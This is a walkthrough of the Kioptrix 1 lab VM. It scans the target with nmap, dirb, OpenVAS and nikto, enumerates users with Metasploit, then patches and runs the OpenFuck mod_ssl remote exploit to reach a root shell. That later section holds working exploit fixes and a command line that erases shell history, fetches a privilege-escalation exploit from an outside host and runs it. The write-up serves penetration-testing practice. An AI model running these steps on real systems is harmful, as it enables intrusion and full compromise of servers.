Kioptrix 1
Setting up the challenge
Download VMWare Workstation and the vulnerable VM, start it.
Scanning with nmap
Finding the vulnerable machine
nmap 10.0.1.0/24
Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-17 20:02 CET
Nmap scan report for 10.0.1.104
Host is up (0.0018s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https
32768/tcp open filenet-tms
MAC Address: 00:0C:29:BE:28:85 (VMware)
The address is 10.0.1.104.
In depth scan
nmap -A 10.0.1.104
Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-17 15:15 CET
Nmap scan report for 10.0.1.104
Host is up (0.00047s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 32768/tcp status
|_ 100024 1 32768/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: HMYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2018-02-16T22:42:12+00:00; -15h34m01s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
|_ SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
32768/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:BE:28:85 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
Host script results:
|_clock-skew: mean: -15h34m01s, deviation: 0s, median: -15h34m01s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE
HOP RTT ADDRESS
1 0.47 ms 10.0.1.104
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 266.87 seconds
Conclusion
| Characteristic | Value |
|---|---|
| Operating System | Running: Linux 2.4.X OS CPE: |
| Kernel | cpe:/o:linux:linux_kernel:2.4 |
| OS details | Linux 2.4.9 - 2.4.18 (likely embedded) |
| Samba | 139/tcp open netbios-ssn Samba smbd (workgroup: HMYGROUP) |
| SSH | OpenSSH 2.9p2 (protocol 1.99) |
| Apache | Apache/1.3.20 (Unix) |
Scanning with dirb
Used to find hidden pages by scanning for common paths.
dirb http://10.0.1.104/ /usr/share/wordlists/dirb/common.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Feb 17 21:49:39 2018
URL_BASE: http://10.0.1.104/
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.0.1.104/ ----
+ http://10.0.1.104/~operator (CODE:403|SIZE:273)
+ http://10.0.1.104/~root (CODE:403|SIZE:269)
+ http://10.0.1.104/cgi-bin/ (CODE:403|SIZE:272)
+ http://10.0.1.104/index.html (CODE:200|SIZE:2890)
==> DIRECTORY: http://10.0.1.104/manual/
==> DIRECTORY: http://10.0.1.104/mrtg/
==> DIRECTORY: http://10.0.1.104/usage/
---- Entering directory: http://10.0.1.104/manual/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.0.1.104/mrtg/ ----
+ http://10.0.1.104/mrtg/index.html (CODE:200|SIZE:17318)
---- Entering directory: http://10.0.1.104/usage/ ----
+ http://10.0.1.104/usage/index.html (CODE:200|SIZE:3704)
-----------------
END_TIME: Sat Feb 17 21:50:04 2018
DOWNLOADED: 13836 - FOUND: 6
Found :
| Type | Address | Response code | Response size |
|---|---|---|---|
| File | http://10.0.1.104/~operator | 403 | 273 |
| File | http://10.0.1.104/~root | 403 | 269 |
| File | http://10.0.1.104/cgi-bin/ | 403 | 272 |
| File | http://10.0.1.104/index.html | 200 | 2890 |
| DIRECTORY | http://10.0.1.104/manual/ | ||
| DIRECTORY | http://10.0.1.104/mrtg/ | ||
| DIRECTORY | http://10.0.1.104/usage/ |
Conclusion
There seems to be the users root and operator.
Scanning with OpenVAS
Install OpenVAS and use it to scan the address.
| NVT Name | Port | Port Protocol | CVSS | Severity | CVEs |
|---|---|---|---|---|---|
| Webalizer Cross Site Scripting Vulnerability | 443 | tcp | 7.5 | High | CVE-2001-0835 |
| Webalizer Cross Site Scripting Vulnerability | 80 | tcp | 7.5 | High | CVE-2001-0835 |
| http TRACE XSS attack | 443 | tcp | 5.8 | Medium | CVE-2004-2320, CVE-2003-1567 |
| http TRACE XSS attack | 80 | tcp | 5.8 | Medium | CVE-2004-2320, CVE-2003-1567 |
| SSL/TLS: Certificate Expired | 443 | tcp | 5 | Medium | NOCVE |
| SSL/TLS: Report Vulnerable Cipher Suites for HTTPS | 443 | tcp | 5 | Medium | CVE-2016-2183, CVE-2016-6329 |
| Apache UserDir Sensitive Information Disclosure | 443 | tcp | 5 | Medium | CVE-2001-1013 |
| Apache UserDir Sensitive Information Disclosure | 80 | tcp | 5 | Medium | CVE-2001-1013 |
| SSL/TLS: Untrusted Certificate Authorities | 443 | tcp | 5 | Medium | NOCVE |
| Apache Web Server ETag Header Information Disclosure Weakness | 443 | tcp | 4.3 | Medium | CVE-2003-1418 |
| Apache Web Server ETag Header Information Disclosure Weakness | 80 | tcp | 4.3 | Medium | CVE-2003-1418 |
| SSL/TLS: DHE_EXPORT Man in the Middle Security Bypass Vulnerability (LogJam) | 443 | tcp | 4.3 | Medium | CVE-2015-4000 |
| SSL/TLS: SSLv3 Protocol CBC Cipher Suites Information Disclosure Vulnerability (POODLE) | 443 | tcp | 4.3 | Medium | CVE-2014-3566 |
| SSL/TLS: Report Weak Cipher Suites | 443 | tcp | 4.3 | Medium | CVE-2013-2566, CVE-2015-2808, CVE-2015-4000 |
| SSH Weak Encryption Algorithms Supported | 22 | tcp | 4.3 | Medium | NOCVE |
| SSL/TLS: RSA Temporary Key Handling RSA_EXPORT Downgrade Issue (FREAK) | 443 | tcp | 4.3 | Medium | CVE-2015-0204 |
| SSL/TLS: Deprecated SSLv2 and SSLv3 Protocol Detection | 443 | tcp | 4.3 | Medium | CVE-2016-0800, CVE-2014-3566 |
| Apache HTTP Server httpOnly Cookie Information Disclosure Vulnerability | 443 | tcp | 4.3 | Medium | CVE-2012-0053 |
| Apache HTTP Server httpOnly Cookie Information Disclosure Vulnerability | 80 | tcp | 4.3 | Medium | CVE-2012-0053 |
| SSL/TLS: Diffie-Hellman Key Exchange Insufficient DH Group Strength Vulnerability | 443 | tcp | 4 | Medium | NOCVE |
| TCP timestamps | 2.6 | Low | NOCVE | ||
| SSH Weak MAC Algorithms Supported | 22 | tcp | 2.6 | Low | NOCVE |
Scanning with nikto
Download or update nikto from GitHub.
./nikto.pl -h 10.0.1.104 -Format csv -o ~/Vulnhub/Kioptrix_1/nikto.csv
| Port | OSVDB | GET/POST | Path | Description |
|---|---|---|---|---|
| 80 | Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b | |||
| 80 | OSVDB-0 | GET | / | Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Thu Sep 6 05:12:46 2001 |
| 80 | OSVDB-0 | GET | / | The anti-clickjacking X-Frame-Options header is not present. |
| 80 | OSVDB-0 | GET | / | The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS |
| 80 | OSVDB-0 | GET | / | The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type |
| 80 | OSVDB-27487 | GET | / | Apache is vulnerable to XSS via the Expect header |
| 80 | OSVDB-0 | OPTIONS | / | Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE |
| 80 | OSVDB-877 | TRACE | / | HTTP TRACE method is active, suggesting the host is vulnerable to XST |
| 80 | OSVDB-0 | GET | ///etc/hosts | The server install allows reading of any system file by adding an extra ‘/’ to the URL. |
| 80 | OSVDB-682 | GET | /usage/ | Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). CA-2000-02. |
| 80 | OSVDB-3268 | GET | /manual/ | Directory indexing found. |
| 80 | OSVDB-3092 | GET | /manual/ | Web server manual found. |
| 80 | OSVDB-3268 | GET | /icons/ | Directory indexing found. |
| 80 | OSVDB-3233 | GET | /icons/README | Apache default file found. |
| 80 | OSVDB-3092 | GET | /test.php | This might be interesting… |
Additionnally the following information is being given:
mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
Apache UserDir Sensitive Information Disclosure
The vulnerability listed in OpenVAS is listed as CVE-2001-1013.
Apache on Red Hat Linux with with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the server.
We open msfconsole to search if there are any exploits available :
msfconsole
msf>search CVE-2001-1013
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/http/apache_userdir_enum normal Apache "mod_userdir" User Enumeration
We use the exploit available
msf> use auxiliary/scanner/http/apache_userdir_enum
msf> show options
msf> set RHOSTS
msf> run
[+] http://10.0.1.104/ - Users found: operator, postgres, root
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Conclusion
The system has the users : operator, postgres and root.
mod_ssl buffer overflow
Source : Hypn.za.net One of the popular boot-to-root VMs has an exploit (764.c) which doesn’t compile so well in modern Kali, producing the errors:
764d.c:643:24: error: ‘SSL2_MAX_CONNECTION_ID_LENGTH’ undeclared here (not in a function)
764d.c:651:2: error: unknown type name ‘RC4_KEY’
764d.c:652:2: error: unknown type name ‘RC4_KEY’
764d.c:844:7: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
764d.c:845:19: error: ‘SSL2_MT_ERROR’ undeclared (first use in this function)
764d.c:882:2: error: unknown type name ‘MD5_CTX’
764d.c:887:23: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
764d.c:977:16: error: ‘SSL2_MT_SERVER_HELLO’ undeclared (first use in this function)
764d.c:1069:10: error: dereferencing pointer to incomplete type ‘EVP_PKEY {aka struct evp_pkey_st}’
764d.c:1106:2: error: unknown type name ‘MD5_CTX’
764d.c:1111:42: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
764d.c:1127:23: error: ‘RC4_KEY’ undeclared (first use in this function)
764d.c:1127:31: error: expected expression before ‘)’ token
764d.c:1131:32: error: expected expression before ‘)’ token
764d.c:1146:16: error: ‘SSL2_MT_SERVER_VERIFY’ undeclared (first use in this function)
764d.c:1158:11: error: ‘SSL2_MT_CLIENT_FINISHED’ undeclared (first use in this function)
764d.c:1171:16: error: ‘SSL2_MT_SERVER_FINISHED’ undeclared (first use in this function)
Luckily there was a blog post written in 2014 by @paulwebsec explaining how to update the exploit, which fixes some of them but still leaves you with:
764b.c:645:24: error: ‘SSL2_MAX_CONNECTION_ID_LENGTH’ undeclared here (not in a function)
764b.c:847:19: error: ‘SSL2_MT_ERROR’ undeclared (first use in this function)
764b.c:979:16: error: ‘SSL2_MT_SERVER_HELLO’ undeclared (first use in this function)
764b.c:1071:10: error: dereferencing pointer to incomplete type ‘EVP_PKEY {aka struct evp_pkey_st}’
764b.c:1148:16: error: ‘SSL2_MT_SERVER_VERIFY’ undeclared (first use in this function)
764b.c:1160:11: error: ‘SSL2_MT_CLIENT_FINISHED’ undeclared (first use in this function)
764b.c:1173:16: error: ‘SSL2_MT_SERVER_FINISHED’ undeclared (first use in this function)
On Kali (and likely other Debian based distros) you can work around this by simply doing an “apt-get install libssl1.0-dev” to roll back your libssl-dev version, but why don’t we get this compiling with the modern lib…
Then changes to make (including Paul’s) are:
1) Add this below line 24 (the last #include):
#include <openssl/rc4.h>
#include <openssl/md5.h>
#define SSL2_MT_ERROR 0
#define SSL2_MT_CLIENT_FINISHED 3
#define SSL2_MT_SERVER_HELLO 4
#define SSL2_MT_SERVER_VERIFY 5
#define SSL2_MT_SERVER_FINISHED 6
#define SSL2_MAX_CONNECTION_ID_LENGTH 16
2) Replace “COMMAND2” on (now) line 672:
#define COMMAND2 “unset HISTFILE; cd /tmp; wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n”
3) Add “const” to the beginning of (now) line 970:
const unsigned char *p, *end;
4) Replace the “if” on (now) line 1078 with:
if (EVP_PKEY_get1_RSA(pkey) == NULL) {
...}
5) Replace the “encrypted_key_length” code on (now) line 1084 with:
encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], EVP_PKEY_get1_RSA(pkey), RSA_PKCS1_PADDING);
6) Install “libssl-dev” (if not already installed):
apt–get install libssl–dev
7) Compile!
gcc -o 764 764.c -lcrypto
Exploiting the overflow
We display the usage with ./764
*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
: Usage: ./764 target box [port] [-c N]
target - supported box eg: 0x00
box - hostname or IP address
port - port for ssl connection
-c open N connections. (use range 40-50 if u dont know)
Supported OffSet:
0x00 - Caldera OpenLinux (apache-1.3.26)
0x01 - Cobalt Sun 6.0 (apache-1.3.12)
...
0x0c - Debian GNU Linux 2.2 Potato (apache_1.3.9-14.1)
0x0d - Debian GNU Linux (apache_1.3.19-1)
0x0e - Debian GNU Linux (apache_1.3.22-2)
From the information gathered we exploit the vulnerability with :
./764 0x6b 10.0.1.104 443
*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; net/0304
--22:08:06-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]
0K ... 100% @ 1.87 MB/s
22:08:07 (1.87 MB/s) - `ptrace-kmod.c' saved [3921/3921]
[+] Attached to 8110
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...From there we have now have a remote shell with root access !